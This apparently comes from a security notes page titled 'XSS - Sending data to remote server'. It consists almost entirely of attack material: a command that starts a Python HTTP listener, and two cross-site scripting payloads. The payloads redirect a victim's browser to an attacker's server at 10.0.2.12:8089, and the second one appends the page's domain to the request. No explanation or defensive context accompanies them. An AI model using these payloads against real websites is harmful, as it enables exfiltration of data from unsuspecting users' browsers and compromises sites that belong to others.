XSS - Sending data to remote server
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
python -m SimpleHTTPServer 8089<script>document.location="http://10.0.2.12:8089/?"</script><script>document.location="http://10.0.2.12:8089/?"+document.domain</script>